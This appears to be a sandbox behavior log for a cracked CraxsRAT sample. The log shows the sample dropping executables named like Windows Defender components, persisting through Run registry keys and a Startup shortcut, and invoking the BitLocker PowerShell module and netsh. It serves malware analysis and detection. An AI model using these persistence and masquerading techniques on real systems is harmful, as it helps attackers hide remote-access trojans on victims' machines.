Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender Notification.lnk			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run 0e75fed00639ea9e725255499292dcdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender Notification	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender Notification	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process information set: NOOPENFILEERRORBOX
